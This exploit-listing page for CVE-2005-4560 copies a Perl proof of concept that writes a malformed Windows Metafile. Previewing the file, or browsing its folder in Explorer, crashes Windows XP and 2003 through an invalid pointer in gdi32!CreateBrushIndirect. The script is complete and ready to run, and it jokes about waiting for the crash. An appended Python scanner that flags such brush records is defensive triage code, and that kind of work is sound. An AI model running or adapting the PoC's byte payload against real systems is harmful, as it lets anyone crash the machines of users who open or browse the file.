0-day XP SP2 wmf exploit

CVE: CVE-2005-4560
Category: CWE-119
Price: Not specified
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2006-08-15
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080062

Below is a copy:

Description:

Yet another Windows Metafile (WMF) denial-of-service exploit.

Systems affected:

+ Windows XP SP2
+ Windows 2003 SP1
+ Windows XP SP1
+ Windows XP
+ Windows 2003

Tech info:

Page fault in gdi32!CreateBrushIndirect() caused by an invalid pointer access.
An incorrect (short) to (void*) sign extension is also present.

Exploit:

=== begin of brush.pl ===
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <[email protected]>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
# 18-byte WMF header followed by the metafile records
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
=== end of brush.pl ===

Just run brush.pl and try to preview brush.wmf (or even browse the folder
containing brush.wmf in Windows Explorer).

Discovered:

06/24/2006; vendor informed but has not answered
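
For triage of WMF files, the following added example (not part of the original advisory or the PoC author's code) walks the metafile record list and reports META_CREATEBRUSHINDIRECT records whose brush style makes Win32 read the 16-bit hatch field as a handle or pointer, which is the pattern in the PoC's last brush record (style 8, hatch 0x8000). The function names and the sample file are constructed for illustration; the style values are the LOGBRUSH constants from wingdi.h.

```python
import struct

META_EOF, META_CREATEBRUSHINDIRECT = 0x0000, 0x02FC
# Win32 LOGBRUSH styles whose lbHatch is a handle or pointer, not a hatch index
POINTER_STYLES = {3: "BS_PATTERN", 5: "BS_DIBPATTERN", 6: "BS_DIBPATTERNPT",
                  7: "BS_PATTERN8X8", 8: "BS_DIBPATTERN8X8"}


def scan_wmf(data):
    """Walk the records of a standard (non-placeable) WMF; return brush findings."""
    if len(data) < 18:
        return ["truncated header"]
    ftype, hdr_words = struct.unpack_from("<HH", data, 0)
    if ftype not in (1, 2) or hdr_words != 9:
        return ["not a standard WMF header"]
    findings, off = [], 18
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        end = off + size_words * 2          # record size is counted in 16-bit words
        if size_words < 3 or end > len(data):
            findings.append(f"offset {off}: bad record size {size_words}")
            break
        if func == META_EOF:
            break
        if func == META_CREATEBRUSHINDIRECT and size_words >= 7:
            # LogBrush parameters: style (u16), colour (u32), hatch (read as signed 16)
            style, _colour, hatch = struct.unpack_from("<HIh", data, off + 6)
            if style in POINTER_STYLES:
                note = " (negative as short, sign-extends)" if hatch < 0 else ""
                findings.append(f"offset {off}: {POINTER_STYLES[style]} "
                                f"hatch 0x{hatch & 0xFFFF:04X}{note}")
        off = end
    return findings


def _record(func, params=b""):
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_sample():
    """Constructed test input: one solid brush, one style-8 brush with hatch 0x8000."""
    body = (_record(META_CREATEBRUSHINDIRECT, struct.pack("<HIH", 0, 0, 0))
            + _record(META_CREATEBRUSHINDIRECT, struct.pack("<HIH", 8, 0, 0x8000))
            + _record(META_EOF))
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(body)) // 2, 2, 7, 0)
    return header + body


if __name__ == "__main__":
    print("\n".join(scan_wmf(build_sample())))
```

A record size that runs past the end of the file is reported and stops the walk, so truncated or malformed files do not cause out-of-bounds reads in the scanner itself.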
